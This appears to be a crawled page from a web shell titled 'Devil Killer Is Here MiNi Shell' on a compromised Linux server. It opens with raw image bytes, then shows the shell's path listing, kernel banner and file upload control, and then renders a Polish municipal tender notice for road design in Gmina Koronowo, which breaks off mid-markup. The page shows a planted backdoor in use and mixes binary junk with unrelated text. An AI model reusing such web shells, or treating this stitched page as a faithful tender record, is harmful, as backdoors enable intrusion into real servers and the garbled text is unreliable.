JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230309/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230309/0012827901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo - kosztorysowej przebudowy dróg gminnych (Zadania 1-7) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Koronowo</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350665</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Zwycięstwa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koronowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-010</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">monika.dunajska@um.koronowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.koronowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo - kosztorysowej przebudowy dróg gminnych (Zadania 1-7) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0611db1b-be5e-11ed-8261-62cbbe4d0ca4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00128279</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00033074/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.25 PROJEKT PRZEBUDOWY DRÓG NA TERENIE GMINY KORONOWO W M. PIECZYSKA, MORZEWIEC, TRYSZCZYN, KRĄPIEWO, GOGOLIN, OKOLE</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/koronowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/koronowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się za pomocą środków komunikacji elektronicznej za pośrednictwem platformy www.platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/koronowo za pośrednictwem formularza „Wyślij wiadomość do zamawiającego”. Wszelką korespondencję związaną z niniejszym postępowaniem, należy przekazywać za pośrednictwem platformy. Korespondencję uważa się za przekazaną w terminie, jeśli dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>2. Osobami uprawnionymi do kontaktu z Wykonawcami są: 1) w zakresie dotyczącym przedmiotu zamówienia: Justyna Drawska, e-mail: justyna.drawska@um.koronowo.pl, tel. 52 3826452 (w zakresie zadania 1, 7); Aleksandra Kisły, e-mail: aleksandra.kisly@um.koronowo.pl, tel. 52 3826452 (w zakresie zadania 2, 5); Maria Różycka-Parol, e-mail: maria.rozycka-parol@um.koronowo.pl tel. 52 3826453 (w zakresie zadania 3, 4, 6); <br/>2) w zakresie dotyczącym zagadnień proceduralnych: Monika Dunajska, e-mail: monika.dunajska@um.koronowo.pl, oraz Dorota Kłobuchowska, e-mail: dorota.klobuchowska@um.koronowo.pl, tel. 52 3826 459.<br/>3. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/koronowo.<br/>4. W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do Zamawiającego”. <br/>5. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do Zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>6. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy.<br/>7. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>8. Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl<br/>(...) Dalsze informacje dotyczące korespondencji elektronicznej zawarte są w Rozdziale XI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) – zwane dalej RODO, informuję, że:<br/>1. Administratorem Państwa danych osobowych jest Burmistrz Koronowa, Plac Zwycięstwa 1, 86-010 Koronowo.<br/>2. Administrator wyznaczył inspektora ochrony danych, z którym mogą się Państwo skontaktować poprzez adres e-mail: ochronadanych@um.koronowo.pl, we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie obowiązujących przepisów prawa, zawartych umów lub na podstawie udzielonej zgody, w celu wypełnienia obowiązków prawnych ciążących na administratorze danych, wynikających z zadań gminy – w oparciu o przepisy ustawy Prawo zamówień publicznych (Dz. U. z 2022 poz. 1710 ze zm. – dalej uPzp) oraz aktów wykonawczych do uPzp, związanych z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie przetargu nieograniczonego i realizacji umowy w sprawie zamówienia publicznego, zawarcia i realizacji umowy z osobą, której dane dotyczą, określonym w treści zgody.<br/>4. Podanie danych osobowych jest wymagane na podstawie przepisów prawa.<br/>5. Państwa dane osobowe będą przekazywane innym organom publicznym i podmiotom wyłącznie na podstawie obowiązujących przepisów prawa.<br/>6. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp, dostawcy systemu elektronicznego obiegu dokumentów, poczty elektronicznej, usług IT oraz podmioty wspierające w świadczeniu usług drogą elektroniczną, organy władzy publicznej oraz podmioty wykonujące zadania publiczne lub działające na zlecenie organów władzy publicznej - w zakresie i w celach, które wynikają z przepisów powszechnie obowiązującego prawa, inne podmioty, które przetwarzają dane osobowe na podstawie umów podpisanych z administratorem, oraz podmioty, które wystąpią o informacje na podstawie ustawy o dostępie do informacji publicznej.<br/>7. Nie podanie przez Państwo danych osobowych wyłącza możliwość realizacji celów określonych w pkt. 3.<br/>(...) Dalsze informacje dot. obowiązku informacyjnego zawarte są w Rozdziale XXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Nie przysługuje Państwu prawo:<br/>- do usunięcia danych osobowych;<br/>- do przenoszenia danych osobowych;<br/>- sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust.1 lit. c RODO.<br/>2. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.11.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1 – &#34;Wykonanie projektu przebudowy ulic na OM Pieczyska w Koronowie&#34;<br/>Zakres projektu obejmuje:<br/>1. Przebudowę następujących dróg gminnych na osiedlu Pieczyska, Koronowo:<br/>•	ul. Lipkusz dz. ewid.: nr 108 – ok. 2800 mb, nr 7/60- ok. 153 mb, nr 72/85-<br/>ok.180 mb, nr 72/42- ok. 46 mb<br/>•	ul. Zajęcza, dz. ewid: nr 7/63- ok. 256 mb, nr 7/61- ok. 105 mb, nr 7/62 – ok. 104 mb<br/>•	ul. Lisia, dz. ewid.: nr 6/24- ok. 236 mb, nr 6/25- ok. 26,5 mb<br/>•	ul. Azaliowa, dz. ewid: nr 72/85- ok. 370 mb<br/>•	ul. Cyprysowa, dz. ewid: nr 72/85- ok. 380 mb<br/>•	ul. Paprociowa, dz. ewid: nr 67/16- ok. 39 mb, nr 67/3- ok. 530 mb, nr 69/1- ok. 520 mb<br/>•	ul. Konwaliowa, dz. ewid: nr 67/43- ok. 290 mb, nr 68/14- ok. 263 mb, <br/>nr 67/29- ok. 40 mb, 68/15- ok.10 mb<br/>•	ul. Grzybowa, dz. ewid.: nr 58/15- ok. 220 mb, dz. 58/63- ok. 105 mb, <br/>dz. 58/16- ok. 100 mb<br/>•	ul. Borowikowa, dz. ewid.: nr 58/14- ok. 220 mb, nr 58/64- ok. 505 mb,<br/> nr 58/90- ok. 195 mb, nr 58/91- ok. 115 mb, nr 58/89- ok. 90 mb, <br/>•	dz. ewid. zgodnie z miejscowym planem zagospodarowania przestrzennego: nr 72/95- ok. 32 mb, nr 72/97- ok. 392 mb, nr 72/99- ok. 34 mb, nr 72/98- ok. 37 mb.<br/>Przybliżona łączna długość dróg podlegających przebudowie wynosi około 8393,5 mb<br/>2. Zlecenie jednostce wykonawstwa geodezyjnego wykonanie map do celów projektowych. Dla przedmiotowego zadania sporządzić mapę do celów projektowych wraz z rozgraniczeniami; orientacyjna ilość wyznaczenia i stabilizacji punktów granicznych wynosi:<br/>-dz. nr 108- 7 sztuk (±5 sztuk),<br/>-dz. nr 68/14- 2 szt. (±2 sztuki),<br/>-dz. nr 58/91- 1 szt. (±2 sztuki),<br/>-dz. nr 68/15- 1 szt. (±2 sztuki).<br/>3. Opracowanie projektu budowlanego przebudowy dróg wraz z projektami wykonawczymi osobno dla poszczególnych ulic wraz z wszystkimi niezbędnymi branżami dla wykonania zadania. <br/>4. Uzyskanie w imieniu Inwestora wszystkich niezbędnych decyzji administracyjnych, w tym decyzji o lokalizacji celu publicznego, decyzji pozwolenia na budowę, zaświadczeń, uzgodnień, opinii i pozwoleń wymaganych przepisami szczególnymi, w tym również wszystkich uzgodnień branżowych niezbędnych do prawidłowego i kompletnego wykonania przedmiotu zamówienia, przede wszystkim: <br/>- wykonanie badań geologicznych<br/>- zaprojektowanie kanału technologicznego<br/>- uzyskanie wyrysów i wypisów z planów zagospodarowania przestrzennego (XXV/249/97, XXVII/239/16, XXV/252/97, XI/101/15, X/93/15, XXV/242/97, XXXI/323/97) oraz decyzji celu publicznego <br/>- uzyskanie decyzji o Środowiskowych Uwarunkowaniach oraz opracowanie raportu oddziaływania przedsięwzięcia na środowisko (jeżeli zajdzie taka konieczność)<br/>- uzyskanie decyzji na wycinkę drzew, o ile zajdzie taka potrzeba<br/>- wykonanie koniecznych opracowań wodno-prawnych wraz z uzyskaniem pozwoleń (o ile będą wymagane)<br/>- zaprojektowanie wszystkich zjazdów na drogi wewnętrzne oraz na przyległe działki, uzgodnienie zjazdów na drogi gminne z odpowiednimi organami<br/>- zaprojektowanie kanalizacji deszczowej na wszystkich ulicach, w działkach drogowych przebiegają sieci: wodociągowa, energetyczna, teletechniczna, kanalizacja sanitarna<br/>- opracowanie i uzyskanie zatwierdzenia projektu tymczasowej organizacji ruchu oraz stałej organizacji ruchu<br/>- opracowanie kompletnej dokumentacji kosztorysowej tzn. kosztorysów inwestorskich wraz z przedmiarami robót dla wszystkich branż i kategorii robót budowlanych niezbędnych do prawidłowej realizacji zadania osobno dla poszczególnych ulic<br/>- zaprojektowanie w technologii zaproponowanej przez projektanta, konieczne jest uzyskanie akceptacji przez Inwestora zaproponowanych rozwiązań na etapie projektu koncepcyjnego, propozycja powinna posiadać uzasadnienie ekonomiczne. Inwestor preferuje technologię, która będzie obejmować wzmocnienie oraz stabilizację istniejącej podbudowy<br/>- opracowanie Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych dla wszystkich branż i kategorii robót budowlanych będących w zakresie projektu osobno dla poszczególnych ulic<br/>- aktualizacji kosztorysu (na własny koszt) po zakończeniu umowy, a przed przystąpieniem do rozpoczęcia prac budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 2 – &#34;Wykonanie projektu przebudowy ul. Dworskiej w miejscowości Morzewiec&#34;<br/>Przygotowanie dokumentacji celem wykonania przebudowy drogi gminnej<br/>I. Dane ogólne<br/>1.	Przebudowa drogi gminnej dz. ewid. nr 42/2 w miejscowości Morzewiec, gmina Koronowo.<br/>2. Dla przedmiotowych działek nie obowiązuje miejscowy plan zagospodarowania przestrzennego.<br/>3.	Odcinek o długości ok. 800 mb.<br/>4. Wszystkie zjazdy na drogi wewnętrzne oraz na przyległe działki.<br/>5. Uzgodnienie zjazdów na drogi gminne z odpowiednimi organami.<br/>6. W drodze znajduje się sieć wodociągowa, energia elektryczna.<br/>7. Odwodnienie nawierzchni drogi na przyległe tereny.<br/>8. Zaprojektowana w technologii zaproponowanej przez projektanta po uzyskaniu akceptacji rozwiązań na etapie projektu koncepcyjnego; propozycja rozwiązania powinna posiadać uzasadnienie ekonomiczne.<br/>9.	Preferowana technologia z wykorzystaniem wzmocnienia i stabilizacji istniejącej podbudowy.<br/>10. Projekt i kosztorys powinien uwzględnić wykonanie regulacji wysokościowej infrastruktury wodociągowej i kanalizacji sanitarnej, tj. zasuw, hydrantów, studni rewizyjnych zlokalizowanych w pasie projektowanej drogi. <br/><br/>II. Jednostka projektowa zobowiązana będzie do:<br/>1. Pozyskania we własnym zakresie i na własny koszt wszystkich danych wyjściowych do projektowania oraz uzgodnień, w tym opinii technicznych, aktualnej mapy do celów projektowych.<br/>2. Opracowania mapy do celów projektowych dla powyższego zadania wraz z rozgraniczeniem. Orientacyjna ilość wyznaczenia i stabilizacji punktów granicznych wynosi 5 sztuk (± 10 sztuk).<br/>3. Uzyskania decyzji o lokalizacji inwestycji celu publicznego, decyzji o środowiskowych uwarunkowaniach oraz pozwolenia wodnoprawnego, o ile przyjęte rozwiązania techniczne wymuszą taką konieczność.<br/>4. Uzyskania decyzji na wycinkę drzew, o ile będzie taka potrzeba.<br/>5. Uzgodnienia projektu z gestorami sieci infrastruktury technicznej.<br/>6. Uzgodnienia z Wydziałem Inwestycji i Remontów Urzędu Miejskiego w Koronowie, przed przystąpieniem do prac projektowych, zakresu robót oraz aspektów technicznych do ujęcia w opracowaniu.<br/>7. Zaprojektowania kanału technologicznego.<br/>8. Dokonania przed właściwym organem zgłoszenia robót budowlanych, bądź, w przypadku konieczności złożenia wniosku o wydanie decyzji pozwolenia na budowę.<br/>9. Opracowania kompletnej dokumentacji kosztorysowej tj. kosztorysów inwestorskich i ofertowych wraz z przedmiarami robót dla wszystkich branż i kategorii robót budowlanych niezbędnych do prawidłowej realizacji zadania.<br/>10. Opracowania Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych dla wszystkich branż i kategorii robót budowlanych będących w zakresie projektu.<br/>11. Wykonania projektu stałej organizacji ruchu.<br/>12. Wykonania projektu tymczasowej organizacji ruchu.<br/>13. Aktualizacji kosztorysu (na własny koszt) po zakończeniu umowy, przed przystąpieniem do rozpoczęcia prac budowlanych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 